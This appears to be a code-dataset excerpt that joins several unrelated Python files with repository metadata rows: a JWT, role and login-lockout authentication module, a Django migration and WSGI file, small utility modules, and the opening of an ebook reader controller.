cast(Dict[str, Any], payload), cls.JWT_SECRET, algorithm=cls.JWT_ALGO
)
def create_temporary_token(
self, user: User, token_type: str, duration: int = 86400
) -> Tuple[str, Payload]:
# invalidate previous tokens with same token_type
for t in self.get_tokens(user=user):
ttype = t.get("token_type")
if ttype is None: # pragma: no cover
continue
if ttype != token_type:
continue
tok = t.get("token")
if tok and self.invalidate_token(tok):
log.info("Previous token invalidated: {}", tok)
expiration = datetime.now(pytz.utc) + timedelta(seconds=duration)
payload, full_payload = self.fill_payload(
user, expiration=expiration, token_type=token_type
)
token = self.create_token(payload)
return token, full_payload
@classmethod
def unpack_token(
cls, token: str, raiseErrors: bool = False
) -> Optional[DecodedPayload]:
try:
return cast(
DecodedPayload,
jwt.decode(token, cls.JWT_SECRET, algorithms=[cls.JWT_ALGO]),
)
# now > exp
except ExpiredSignatureError as e:
# should this token be invalidated into the DB?
if raiseErrors:
raise e
else:
log.info("Unable to decode JWT token. {}", e)
# now < nbf
except ImmatureSignatureError as e:
if raiseErrors:
raise e
else:
log.info("Unable to decode JWT token. {}", e)
except Exception as e:
if raiseErrors:
raise e
else:
log.warning("Unable to decode JWT token. {}", e)
return None
@staticmethod
def unpacked_token(
valid: bool,
token: Optional[str] = None,
jti: Optional[str] = None,
user: Optional[User] = None,
) -> Tuple[bool, Optional[str], Optional[str], Optional[User]]:
return (valid, token, jti, user)
def verify_token(
self,
token: Optional[str],
raiseErrors: bool = False,
token_type: Optional[str] = None,
) -> Tuple[bool, Optional[str], Optional[str], Optional[User]]:
if token is None:
if raiseErrors:
raise InvalidToken("Missing token")
return self.unpacked_token(False)
# Decode the current token
payload = self.unpack_token(token, raiseErrors=raiseErrors)
if payload is None:
if raiseErrors:
raise InvalidToken("Invalid payload") # pragma: no cover
return self.unpacked_token(False)
payload_type = payload.get("t", self.FULL_TOKEN)
if token_type is None:
token_type = self.FULL_TOKEN
if token_type != payload_type:
log.error("Invalid token type {}, required: {}", payload_type, token_type)
if raiseErrors:
raise InvalidToken("Invalid token type")
return self.unpacked_token(False)
user_id = payload.get("user_id")
# Get the user from payload
user = self.get_user(user_id=user_id)
if user is None:
if raiseErrors:
raise InvalidToken("No user from payload")
return self.unpacked_token(False)
# implemented from the specific db services
if not self.verify_token_validity(jti=payload["jti"], user=user):
if raiseErrors:
raise InvalidToken("Token is not valid")
return self.unpacked_token(False)
log.debug("User {} is authorized", user.email)
return self.unpacked_token(True, token=token, jti=payload["jti"], user=user)
def fill_payload(
self,
user: User,
expiration: Optional[datetime] = None,
token_type: Optional[str] = None,
) -> Tuple[Payload, Payload]:
"""Informations to store inside the JWT token,
starting from the user obtained from the current service
Claim attributes listed here:
http://blog.apcelent.com/json-web-token-tutorial-example-python.html
TTL is measured in seconds
"""
payload: Payload = {"user_id": user.uuid, "jti": getUUID()}
full_payload: Payload = payload.copy()
if not token_type:
token_type = self.FULL_TOKEN
short_token = False
if token_type in (
self.PWD_RESET,
self.ACTIVATE_ACCOUNT,
self.UNLOCK_CREDENTIALS,
):
short_token = True
payload["t"] = token_type
full_payload["t"] = token_type
now = datetime.now(pytz.utc)
if expiration is None:
expiration = now + timedelta(seconds=self.DEFAULT_TOKEN_TTL)
full_payload["iat"] = now
full_payload["nbf"] = now # you may add a timedelta
full_payload["exp"] = expiration
if not short_token:
payload["iat"] = full_payload["iat"]
payload["nbf"] = full_payload["nbf"]
payload["exp"] = full_payload["exp"]
# first used for encoding
# second used to store information on backend DB
return payload, full_payload
# ###############################
# ##### Roles handling ######
# ###############################
def is_admin(self, user: User) -> bool:
"""Check if current user has Administration role"""
return self.verify_roles(user, [Role.ADMIN], warnings=False)
def is_staff(self, user: User) -> bool:
"""Check if current user has Staff role"""
return self.verify_roles(user, [Role.STAFF], warnings=False)
def is_coordinator(self, user: User) -> bool:
"""Check if current user has Coordinator role"""
return self.verify_roles(user, [Role.COORDINATOR], warnings=False)
def verify_roles(
self,
user: User,
roles: Optional[List[Union[str, Role]]],
required_roles: str = ALL_ROLES,
warnings: bool = True,
) -> bool:
if not roles:
return True
current_roles = self.get_roles_from_user(user)
if required_roles == ALL_ROLES:
for role in roles:
if isinstance(role, Role):
role = role.value
if role not in current_roles:
if warnings:
log.warning("Auth role '{}' missing for request", role)
return False
return True
if required_roles == ANY_ROLE:
for role in roles:
if isinstance(role, Role):
role = role.value
if role in current_roles:
return True
log.warning(
"Expected at least one roles from {}, found none in {}",
roles,
current_roles,
)
return False
log.critical("Unknown role authorization requirement: {}", required_roles)
return False
@staticmethod
def custom_user_properties_pre(
userdata: Dict[str, Any]
) -> Tuple[Dict[str, Any], Dict[str, Any]]:
try:
userdata, extradata = mem.customizer.custom_user_properties_pre(userdata)
except RestApiException: # pragma: no cover
raise
except Exception as e: # pragma: no cover
raise BadRequest(f"Unable to pre-customize user properties: {e}")
if "email" in userdata:
userdata["email"] = userdata["email"].lower()
return userdata, extradata
@staticmethod
def custom_user_properties_post(
user: User, userdata: Props, extra_userdata: Props, db: "Connector"
) -> Props:
try:
mem.customizer.custom_user_properties_post(
user, userdata, extra_userdata, db
)
except RestApiException: # pragma: no cover
raise
except Exception as e: # pragma: no cover
raise BadRequest(f"Unable to post-customize user properties: {e}")
return userdata
# ###########################
# # Login attempts handling #
# ###########################
def register_failed_login(self, username: str, user: Optional[User]) -> None:
self.save_login(username, user, failed=True)
if self.MAX_LOGIN_ATTEMPTS == 0:
log.debug("Failed login are not considered in this configuration")
return
if self.count_failed_login(username) < self.MAX_LOGIN_ATTEMPTS:
return
log.error(
"Reached the maximum number of failed login, account {} is blocked",
username,
)
if user:
# Import here to prevent circular dependencies
from restapi.connectors.smtp.notifications import notify_login_block
unlock_token, payload = self.create_temporary_token(
user, self.UNLOCK_CREDENTIALS
)
self.save_token(
user, unlock_token, payload, token_type=self.UNLOCK_CREDENTIALS
)
server_url = get_frontend_url()
rt = unlock_token.replace(".", "+")
url = f"{server_url}/app/login/unlock/{rt}"
failed_logins = self.get_logins(username, only_unflushed=True)
notify_login_block(
user,
reversed(failed_logins),
self.FAILED_LOGINS_EXPIRATION.seconds,
url,
)
def count_failed_login(self, username: str) -> int:
failed_logins = self.get_logins(username, only_unflushed=True)
if not failed_logins:
return 0
last_failed = failed_logins[-1]
exp = last_failed.date + self.FAILED_LOGINS_EXPIRATION
if get_now(exp.tzinfo) > exp:
self.flush_failed_logins(username)
return 0
return len(failed_logins)
def get_totp_secret(self, user: User) -> str:
if TESTING: # pragma: no cover
# TESTING_TOTP_HASH is set by setup-cypress github action
if p := Env.get("AUTH_TESTING_TOTP_HASH", ""):
return p
if not user.mfa_hash:
random_hash = pyotp.random_base32()
user.mfa_hash = self.fernet.encrypt(random_hash.encode()).decode()
self.save_user(user)
try:
return self.fernet.decrypt(user.mfa_hash.encode()).decode()
# to test this exception change the fernet key used to encrypt mfa_hash
except InvalidFernetToken:
raise ServerError("Invalid server signature")
def verify_totp(self, user: User, totp_code: Optional[str]) -> bool:
if totp_code is None:
raise Unauthorized("Verification code is missing")
secret = self.get_totp_secret(user)
totp = pyotp.TOTP(secret)
if not totp.verify(totp_code, valid_window=self.TOTP_VALIDITY_WINDOW):
self.log_event(
Events.failed_login,
payload={"totp": totp_code},
user=user,
)
self.register_failed_login(user.email, user=user)
raise Unauthorized("Verification code is not valid")
return True
def get_qrcode(self, user: User) -> str:
secret = self.get_totp_secret(user)
totp = pyotp.TOTP(secret)
project_name = get_project_configuration("project.title", "No project name")
otpauth_url = totp.provisioning_uri(project_name)
qr_url = segno.make(otpauth_url)
qr_stream = BytesIO()
qr_url.save(qr_stream, kind="png", scale=5)
return base64.b64encode(qr_stream.getvalue()).decode("utf-8")
def verify_password_strength(
self, pwd: str, old_pwd: Optional[str], email: str, name: str, surname: str
) -> Tuple[bool, str]:
if old_pwd:
if pwd == old_pwd:
return False, "The new password cannot match the previous password"
# in case old_pwd is a hash
if self.verify_password(pwd, old_pwd):
return False, "The new password cannot match the previous password"
if len(pwd) < self.MIN_PASSWORD_LENGTH:
MIN = self.MIN_PASSWORD_LENGTH
return False, f"Password is too short, use at least {MIN} characters"
if not re.search("[a-z]", pwd):
return False, "Password is too weak, missing lower case letters"
if not re.search("[A-Z]", pwd):
return False, "Password is too weak, missing upper case letters"
if not re.search("[0-9]", pwd):
return False, "Password is too weak, missing numbers"
special_characters = "[^a-zA-Z0-9]"
if not re.search(special_characters, pwd):
return False, "Password is too weak, missing special characters"
MIN_CONTAINED_LEN = 3
p_lower = pwd.lower()
if len(name) > MIN_CONTAINED_LEN and name.lower() in p_lower:
return False, "Password is too weak, can't contain your name"
if len(surname) > MIN_CONTAINED_LEN and surname.lower() in p_lower:
return False, "Password is too weak, can't contain your name"
cleaner = r"[\.|_]"
email_clean = re.sub(cleaner, "", email.lower().split("@")[0])
p_clean = re.sub(cleaner, "", p_lower.lower())
if len(email_clean) > MIN_CONTAINED_LEN and email_clean in p_clean:
return False, "Password is too weak, can't contain your email address"
return True, ""
def change_password(
self,
user: User,
password: str,
new_password: Optional[str],
password_confirm: Optional[str],
) -> bool:
if new_password is None:
raise BadRequest("Missing new password")
if password_confirm is None:
raise BadRequest("Missing password confirmation")
if new_password != password_confirm:
raise Conflict("Your password doesn't match the confirmation")
check, msg = self.verify_password_strength(
pwd=new_password,
old_pwd=password,
email=user.email,
name=user.name,
surname=user.surname,
)
if not check:
raise Conflict(msg)
user.password = BaseAuthentication.get_password_hash(new_password)
user.last_password_change = datetime.now(pytz.utc)
self.save_user(user)
self.log_event(Events.change_password, user=user)
for token in self.get_tokens(user=user):
try:
self.invalidate_token(token=token["token"])
except Exception as e: # pragma: no cover
log.critical("Failed to invalidate token {}", e)
return True
def check_password_validity(
self, user: User, totp_authentication: bool
) -> Dict[str, List[str]]:
# ##################################################
# Check if something is missing in the authentication and ask additional actions
# raises exceptions in case of errors
message: Dict[str, List[str]] = {"actions": [], "errors": []}
last_pwd_change = user.last_password_change
if last_pwd_change is None or last_pwd_change == 0:
last_pwd_change = EPOCH
if self.FORCE_FIRST_PASSWORD_CHANGE and last_pwd_change == EPOCH:
message["actions"].append("FIRST LOGIN")
message["errors"].append("Please change your temporary password")
self.log_event(Events.password_expired, user=user)
if totp_authentication:
message["qr_code"] = [self.get_qrcode(user)]
elif self.MAX_PASSWORD_VALIDITY:
valid_until = last_pwd_change + self.MAX_PASSWORD_VALIDITY
# offset-naive datetime to compare with MySQL
now = get_now(last_pwd_change.tzinfo)
expired = last_pwd_change == EPOCH or valid_until < now
if expired:
message["actions"].append("PASSWORD EXPIRED")
message["errors"].append("Your password is expired, please change it")
self.log_event(Events.password_expired, user=user)
return message
def verify_blocked_username(self, username: str) -> None:
# We do not count failed logins
if self.MAX_LOGIN_ATTEMPTS <= 0:
return
# We register failed logins but the user does not reached it yet
if self.count_failed_login(username) < self.MAX_LOGIN_ATTEMPTS:
return
self.log_event(
Events.refused_login,
payload={
"username": username,
"motivation": "account blocked due to too many failed logins",
},
)
# Dear user, you have exceeded the limit!
raise Forbidden(
"Sorry, this account is temporarily blocked "
"due to the number of failed login attempts."
)
@classmethod
def verify_user_status(cls, user: User) -> None:
if not user.is_active:
cls.log_event(
Events.refused_login,
payload={"username": user.email, "motivation": "account not active"},
)
# Beware, frontend leverages on this exact message,
# do not modified it without fix also on frontend side
raise Forbidden("Sorry, this account is not active")
now: Optional[datetime] = None
if cls.DISABLE_UNUSED_CREDENTIALS_AFTER and user.last_login:
if TESTING and user.email == cls.default_user:
log.info("Default user can't be blocked for inactivity during tests")
else:
now = get_now(user.last_login.tzinfo)
if user.last_login + cls.DISABLE_UNUSED_CREDENTIALS_AFTER < now:
cls.log_event(
Events.refused_login,
payload={
"username": user.email,
"motivation": "account blocked due to inactivity",
},
)
raise Forbidden("Sorry, this account is blocked for inactivity")
if user.expiration:
# Reuse the now instance, if previously inizialized
# tzinfo should be the same for both last_login and expiration fields
if not now:
now = get_now(user.expiration.tzinfo)
if user.expiration < now:
cls.log_event(
Events.refused_login,
payload={"username": user.email, "motivation": "account expired"},
)
raise Forbidden("Sorry, this account is expired")
# Mostly copied in definition.py
@classmethod
def log_event(
cls,
event: Events,
target: Optional[Any] = None,
payload: Optional[Dict[str, Any]] = None,
user: Optional[Any] = None,
) -> None:
try:
url_path = request.path
except RuntimeError:
url_path = "-"
save_event_log(
event=event,
payload=payload,
user=user,
target=target,
ip=cls.get_remote_ip(),
url=url_path,
)
def init_auth_db(self, options: Dict[str, bool]) -> None:
self.init_roles()
default_group = self.init_groups(force=options.get("force_group", False))
self.init_users(
default_group, self.roles, force=options.get("force_user", False)
)
def init_roles(self) -> None:
current_roles = {role.name: role for role in self.get_roles()}
role_names = list(self.roles_data.values())
num_of_roles = len(role_names)
num_of_unique_roles = len(list(set(role_names)))
if num_of_roles != num_of_unique_roles:
print_and_exit("Found duplicated role names: {}", str(sorted(role_names)))
for role_name in self.roles:
description = self.roles_data.get(role_name, ROLE_DISABLED)
if r := current_roles.get(role_name):
if r.description == description:
log.info("Role {} already exists", role_name)
else:
log.info("Role {} already exists, updating description", role_name)
r.description = description
self.save_role(r)
else:
log.info("Creating role: {}", role_name)
self.create_role(name=role_name, description=description)
for r in current_roles:
if r not in self.roles:
log.warning("Unknown role found: {}", r)
def init_groups(self, force: bool) -> Group:
create = False
update = False
default_group = self.get_group(name=DEFAULT_GROUP_NAME)
# If there are no groups, let's create the default group
if not self.get_groups():
create = True
# If there are some groups skip group creation in absence of a force flag
elif force:
# If force flag is enable, create the default group if missing or update it
create = default_group is None
update = default_group is not None
if create:
default_group = self.create_group(
{
"shortname": DEFAULT_GROUP_NAME,
"fullname": DEFAULT_GROUP_DESCR,
}
)
log.info("Injected default group")
elif update:
log.info("Default group already exists, updating")
# Added to make the life easier to mypy... but cannot be False
if default_group:
default_group.shortname = DEFAULT_GROUP_NAME
default_group.fullname = DEFAULT_GROUP_DESCR
else: # pragma: no cover
log.critical("Default group not found")
self.save_group(default_group)
elif default_group:
log.info("Default group already exists")
else:
log.info("Default group does not exist but other groups do")
return default_group
def init_users(self, default_group: Group, roles: List[str], force: bool) -> User:
create = False
update = False
default_user = self.get_user(username=self.default_user)
# If there are no users, let's create the default user
if not self.get_users():
create = True
# If there are some users skip user creation in absence of a force flag
elif force:
# If force flag is enable, create the default user if missing or update it
create = default_user is None
update = default_user is not None
if self.FORCE_FIRST_PASSWORD_CHANGE:
last_password_change = None
else:
last_password_change = datetime.now(pytz.utc)
if create:
default_user = self.create_user(
{
"email": self.default_user,
"name": "Default",
"surname": "User",
"password": self.default_password,
"last_password_change": last_password_change,
},
roles=roles,
)
self.add_user_to_group(default_user, default_group)
# This is required to execute the commit on sqlalchemy...
self.save_user(default_user)
log.info("Injected default user")
elif update:
# Added to make the life easier to mypy... but cannot be False
if default_user:
log.info("Default user already exists, updating")
default_user.email = self.default_user
default_user.name = "Default"
default_user.surname = "User"
default_user.password = self.get_password_hash(self.default_password)
default_user.last_password_change = last_password_change
self.link_roles(default_user, roles)
self.add_user_to_group(default_user, default_group)
self.save_user(default_user)
else: # pragma: no cover
log.critical("Default user not found")
elif default_user:
log.info("Default user already exists")
else:
log.info("Default user does not exist but other users do")
# Assign all users without a group to the default group
for user in self.get_users():
if not user.belongs_to:
self.add_user_to_group(user, default_group)
return default_user
# ########################
# # Abstract methods # #
# ########################
@abstractmethod
def get_user(
self, username: Optional[str] = None, user_id: Optional[str] = None
) -> Optional[User]:
"""
How to retrieve a single user from the current authentication db,
based on the unique username or the user_id
return None if no filter parameter is given
"""
...
@abstractmethod
def get_users(self) -> List[User]:
"""
How to retrieve a list of all users from the current authentication db
"""
...
@abstractmethod
def save_user(self, user: User) -> bool:
# log.error("Users are not saved in base authentication")
...
@abstractmethod
def delete_user(self, user: User) -> bool:
# log.error("Users are not deleted in base authentication")
...
@abstractmethod
def get_group(
self, group_id: Optional[str] = None, name: Optional[str] = None
) -> Optional[Group]:
"""
How to retrieve a single group from the current authentication db
"""
...
@abstractmethod
def get_groups(self) -> List[Group]:
"""
How to retrieve groups list from the current authentication db
"""
...
@abstractmethod
def get_user_group(self, user: User) -> Group:
"""
How to retrieve the group that the user belongs to from the current auth db
"""
...
@abstractmethod
def get_group_members(self, group: Group) -> List[User]:
"""
How to retrieve group users list from the current authentication db
"""
...
@abstractmethod
def save_group(self, group: Group) -> bool:
...
@abstractmethod
def delete_group(self, group: Group) -> bool:
...
@abstractmethod
def get_tokens(
self,
user: Optional[User] = None,
token_jti: Optional[str] = None,
get_all: bool = False,
) -> List[Token]:
"""
Return the list of tokens
"""
...
@abstractmethod
def verify_token_validity(self, jti: str, user: User) -> bool:
"""
This method MUST be implemented by specific Authentication Methods
to add more specific validation contraints
"""
...
@abstractmethod
def save_token(
self, user: User, token: str, payload: Payload, token_type: Optional[str] = None
) -> None:
log.debug("Tokens is not saved in base authentication")
@abstractmethod
def invalidate_token(self, token: str) -> bool:
"""
With this method the specified token must be invalidated
as expected after a user logout
"""
...
@abstractmethod
def get_roles(self) -> List[RoleObj]:
"""
How to retrieve all the roles
"""
...
@abstractmethod
def get_roles_from_user(self, user: Optional[User]) -> List[str]:
"""
Retrieve roles from a user object from the current auth service
"""
...
@abstractmethod
def create_role(self, name: str, description: str) -> None:
"""
A method to create a new role
"""
...
@abstractmethod
def save_role(self, role: RoleObj) -> bool:
...
# ################
# # Create Users #
# ################
@abstractmethod
def create_user(self, userdata: Dict[str, Any], roles: List[str]) -> User:
"""
A method to create a new user
"""
...
@abstractmethod
def link_roles(self, user: User, roles: List[str]) -> None:
"""
A method to assign roles to a user
"""
...
@abstractmethod
def create_group(self, groupdata: Dict[str, Any]) -> Group:
"""
A method to create a new group
"""
...
@abstractmethod
def add_user_to_group(self, user: User, group: Group) -> None:
"""
Save the group.members -> user relationship
"""
...
@abstractmethod
def save_login(self, username: str, user: Optional[User], failed: bool) -> None:
"""
Save login information
"""
...
@abstractmethod
def get_logins(
self, username: Optional[str] = None, only_unflushed: bool = False
) -> List[Login]:
"""
Save login information
"""
...
@abstractmethod
def flush_failed_logins(self, username: str) -> None:
"""
Flush failed logins for the give username
"""
...
class NoAuthentication(BaseAuthentication): # pragma: no cover
# Also used by POST user
def create_user(self, userdata: Dict[str, Any], roles: List[str]) -> User:
raise NotImplementedError("Create User not implemented with No Authentication")
def link_roles(self, user: User, roles: List[str]) -> None:
return None
def create_group(self, groupdata: Dict[str, Any]) -> Group:
raise NotImplementedError("Create Group not implemented with No Authentication")
def add_user_to_group(self, user: User, group: Group) -> None:
return None
def get_user(
self, username: Optional[str] = None, user_id: Optional[str] = None
) -> Optional[User]:
return None
def get_users(self) -> List[User]:
return []
def save_user(self, user: User) -> bool:
return False
def delete_user(self, user: User) -> bool:
return False
def get_group(
self, group_id: Optional[str] = None, name: Optional[str] = None
) -> Optional[Group]:
return None
def get_groups(self) -> List[Group]:
return []
def get_user_group(self, user: User) -> Group:
raise NotImplementedError("Get Group not implemented with No Authentication")
def get_group_members(self, group: Group) -> List[User]:
return []
def save_group(self, group: Group) -> bool:
return False
def delete_group(self, group: Group) -> bool:
return False
def get_roles(self) -> List[RoleObj]:
return []
def get_roles_from_user(self, user: Optional[User]) -> List[str]:
return []
def create_role(self, name: str, description: str) -> None:
return None
def save_role(self, role: RoleObj) -> bool:
return False
def save_token(
self, user: User, token: str, payload: Payload, token_type: Optional[str] = None
) -> None:
return None
def verify_token_validity(self, jti: str, user: User) -> bool:
return False
def get_tokens(
self,
user: Optional[User] = None,
token_jti: Optional[str] = None,
get_all: bool = False,
) -> List[Token]:
return []
def invalidate_token(self, token: str) -> bool:
return False
def save_login(self, username: str, user: Optional[User], failed: bool) -> None:
return None
def get_logins(
self, username: Optional[str] = None, only_unflushed: bool = False
) -> List[Login]:
raise NotImplementedError("Get Login not implemented with No Authentication")
def flush_failed_logins(self, username: str) -> None:
return None
| 31.809129 | 88 | 0.592791 |
f8571344edc69dc4b19f2efa009b42cb8128dfd5 | 393 | py | Python | landing/migrations/0007_auto_20210416_1917.py | cactus-computing/product-recommendation | b5d9bb27205a4fb032fd19934ecab56a5a8c6d81 | [
"MIT"
] | null | null | null | landing/migrations/0007_auto_20210416_1917.py | cactus-computing/product-recommendation | b5d9bb27205a4fb032fd19934ecab56a5a8c6d81 | [
"MIT"
] | null | null | null | landing/migrations/0007_auto_20210416_1917.py | cactus-computing/product-recommendation | b5d9bb27205a4fb032fd19934ecab56a5a8c6d81 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.4 on 2021-04-16 19:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('landing', '0006_auto_20210416_1817'),
]
operations = [
migrations.AddField(
model_name='contact',
name='created_at',
field=models.DateTimeField(auto_now=True),
),
]
| 20.684211 | 54 | 0.605598 |
51e6f4f88ed90bde22dd3cf737d51770b60491da | 658 | py | Python | amplify/agent/util/loader.py | digideskio/digidesk-amplified | 547f899d6fd47dc726df28ee90bf3511f02bd6cf | [
"BSD-2-Clause"
] | null | null | null | amplify/agent/util/loader.py | digideskio/digidesk-amplified | 547f899d6fd47dc726df28ee90bf3511f02bd6cf | [
"BSD-2-Clause"
] | null | null | null | amplify/agent/util/loader.py | digideskio/digidesk-amplified | 547f899d6fd47dc726df28ee90bf3511f02bd6cf | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
__author__ = "Mike Belov"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev"]
__license__ = ""
__maintainer__ = "Mike Belov"
__email__ = "dedm@nginx.com"
def import_class(klass):
module_name = '.'.join(klass.split('.')[:-1])
class_name = klass.split('.')[-1:].pop()
module = import_module(module_name)
return getattr(module, class_name)
def import_module(name):
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
| 27.416667 | 97 | 0.656535 |
def8b0aec954f6cdbd24d74e37b1af7436efa0a7 | 1,442 | py | Python | conductor/conductor/common/utils/basic_auth_util.py | onap/optf-has | dd06e2675aedd7ae6344f2f51e70bbd468f36ce5 | [
"Apache-2.0"
] | 4 | 2019-02-14T19:18:09.000Z | 2019-10-21T17:17:59.000Z | conductor/conductor/common/utils/basic_auth_util.py | onap/optf-has | dd06e2675aedd7ae6344f2f51e70bbd468f36ce5 | [
"Apache-2.0"
] | null | null | null | conductor/conductor/common/utils/basic_auth_util.py | onap/optf-has | dd06e2675aedd7ae6344f2f51e70bbd468f36ce5 | [
"Apache-2.0"
] | 4 | 2019-05-09T07:05:54.000Z | 2020-11-20T05:56:47.000Z | #
# -------------------------------------------------------------------------
# Copyright (c) 2015-2018 AT&T Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
import base64
from conductor.i18n import _, _LI, _LE
from oslo_log import log
LOG = log.getLogger(__name__)
def encode(user_id, password):
""" Provide the basic authencation encoded value in an 'Authorization' Header """
user_pass = user_id + ":" + password
# Here user_pass is str type but in python 3.x version, base64.b64encode is expecting byte
# like object so we need to convert the str into bytes
user_pass = user_pass.encode() # converting str into bytes form
base64_val = base64.b64encode(user_pass).decode()
authorization_val = _LE("Basic {}".format(base64_val))
return authorization_val
| 36.974359 | 106 | 0.638696 |
069e4c0507370f6176175763df8a27df9cf56367 | 407 | py | Python | backend/iris_lite_29300/wsgi.py | crowdbotics-apps/iris-lite-29300 | 49e487d9888b2ac95e23714c3ce22c03a1a3ab1f | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/iris_lite_29300/wsgi.py | crowdbotics-apps/iris-lite-29300 | 49e487d9888b2ac95e23714c3ce22c03a1a3ab1f | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/iris_lite_29300/wsgi.py | crowdbotics-apps/iris-lite-29300 | 49e487d9888b2ac95e23714c3ce22c03a1a3ab1f | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | """
WSGI config for iris_lite_29300 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'iris_lite_29300.settings')
application = get_wsgi_application()
| 23.941176 | 78 | 0.793612 |
4b2de3f4fa6b152697dea3402627288271d878ec | 15,425 | py | Python | bookworm/reader.py | mush42/bookworm | a4bdd89363137a89a1bed1e9e072de4fb55576fd | [
"MIT"
] | 18 | 2019-07-19T22:12:15.000Z | 2020-08-26T17:45:19.000Z | bookworm/reader.py | mush42/bookworm | a4bdd89363137a89a1bed1e9e072de4fb55576fd | [
"MIT"
] | 44 | 2019-07-15T10:17:00.000Z | 2020-07-26T11:22:53.000Z | bookworm/reader.py | mush42/bookworm | a4bdd89363137a89a1bed1e9e072de4fb55576fd | [
"MIT"
] | 9 | 2019-09-03T13:13:31.000Z | 2020-08-25T13:55:27.000Z | # coding: utf-8
import os
from contextlib import suppress
from pathlib import Path
from bookworm import typehints as t
from bookworm import app
from bookworm import config
from bookworm.commandline_handler import run_subcommand_in_a_new_process
from bookworm.database import DocumentPositionInfo
from bookworm.i18n import is_rtl
from bookworm.document.uri import DocumentUri
from bookworm.document.formats import *
from bookworm.document import (
BaseDocument,
BasePage,
Section,
ChangeDocument,
DocumentCapability as DC,
DocumentError,
DocumentIOError,
DocumentEncryptedError,
PaginationError,
ArchiveContainsNoDocumentsError,
ArchiveContainsMultipleDocuments,
)
from bookworm.signals import (
reader_book_loaded,
reader_book_unloaded,
reader_page_changed,
reader_section_changed,
reading_position_change,
)
from bookworm.structured_text import TextStructureMetadata, SemanticElementType
from bookworm.logger import logger
log = logger.getChild(__name__)
PASS_THROUGH__DOCUMENT_EXCEPTIONS = {
ArchiveContainsNoDocumentsError,
ArchiveContainsMultipleDocuments,
}
def get_document_format_info():
return BaseDocument.document_classes
class ReaderError(Exception):
"""Base class for all reader exceptions."""
class ResourceDoesNotExist(ReaderError):
"""The file does not exist."""
class UnsupportedDocumentError(ReaderError):
"""File type/format is not supported."""
class DecryptionRequired(Exception):
"""Raised to signal to the view that the document requires a password to be decrypted ."""
class UriResolver:
"""Retrieves a document given a uri."""
def __init__(self, uri):
if isinstance(uri, str):
try:
self.uri = DocumentUri.from_uri_string(uri)
except ValueError as e:
raise ReaderError(f"Failed to parse document uri {self.uri}") from e
else:
self.uri = uri
doc_format_info = get_document_format_info()
if (doc_format := self.uri.format) not in doc_format_info:
raise UnsupportedDocumentError(
f"Could not open document from uri {self.uri}. The format is not supported."
)
self.document_cls = doc_format_info[doc_format]
def __repr__(self):
return f"UriResolver(uri={self.uri})"
def should_read_async(self):
return self.document_cls.should_read_async()
def read_document(self):
try:
return self._do_read_document()
except:
if (fallback_uri := self.uri.fallback_uri) is not None:
return UriResolver(uri=fallback_uri).read_document()
raise
def _do_read_document(self):
document = self.document_cls(self.uri)
try:
document.read()
except DocumentEncryptedError:
raise DecryptionRequired
except DocumentIOError as e:
raise ResourceDoesNotExist("Failed to load document") from e
except ChangeDocument as e:
log.debug(
f"Changing document from {e.old_uri} to {e.new_uri}. Reason {e.reason}"
)
return UriResolver(uri=e.new_uri).read_document()
except Exception as e:
if type(e) in PASS_THROUGH__DOCUMENT_EXCEPTIONS:
raise e
raise ReaderError("Failed to open document") from e
return document
class EBookReader:
"""The controller that glues together the
document model and the view model.
"""
__slots__ = [
"document",
"stored_document_info",
"view",
"__state",
"current_book",
]
# Convenience method: make this available for importers as a staticmethod
get_document_format_info = staticmethod(get_document_format_info)
def __init__(self, view):
self.view = view
self.reset()
def reset(self):
self.document = None
self.stored_document_info = None
self.__state = {}
def set_document(self, document):
self.document = document
self.current_book = self.document.metadata
self.__state.setdefault("current_page_index", -1)
self.set_view_parameters()
self.current_page = 0
if self.document.uri.view_args.get("save_last_position", True):
log.debug("Retrieving last saved reading position from the database")
self.stored_document_info = DocumentPositionInfo.get_or_create(
title=self.current_book.title, uri=self.document.uri
)
if open_args := self.document.uri.openner_args:
page = int(open_args.get("page", 0))
pos = int(open_args.get("position", 0))
self.go_to_page(page, pos)
self.view.contentTextCtrl.SetFocus()
elif (
self.stored_document_info
and config.conf["general"]["open_with_last_position"]
):
try:
log.debug("Navigating to the last saved position.")
page_number, pos = self.stored_document_info.get_last_position()
self.go_to_page(page_number, pos)
except:
log.exception(
"Failed to restore last saved reading position", exc_info=True
)
if self.active_section is None:
self.__state.setdefault(
"active_section",
self.document.get_section_at_position(self.view.get_insertion_point()),
)
reader_book_loaded.send(self)
def set_view_parameters(self):
self.view.set_title(self.get_view_title(include_author=True))
self.view.set_text_direction(self.document.language.is_rtl)
self.view.add_toc_tree(self.document.toc_tree)
def load(self, uri: DocumentUri):
document = UriResolver(uri).read_document()
self.set_document(document)
def unload(self):
if self.ready:
try:
log.debug("Saving current position.")
self.save_current_position()
log.debug("Closing current document.")
self.document.close()
except:
log.exception(
"An exception was raised while closing the eBook", exc_info=True
)
if app.debug:
raise
finally:
self.reset()
reader_book_unloaded.send(self)
def save_current_position(self):
if self.stored_document_info is None:
return
self.stored_document_info.save_position(
self.current_page,
self.view.get_insertion_point(),
)
@property
def ready(self) -> bool:
return self.document is not None
@property
def active_section(self) -> Section:
return self.__state.get("active_section")
@active_section.setter
def active_section(self, value: Section):
if (self.active_section is not None) and (
value.unique_identifier == self.active_section.unique_identifier
):
return
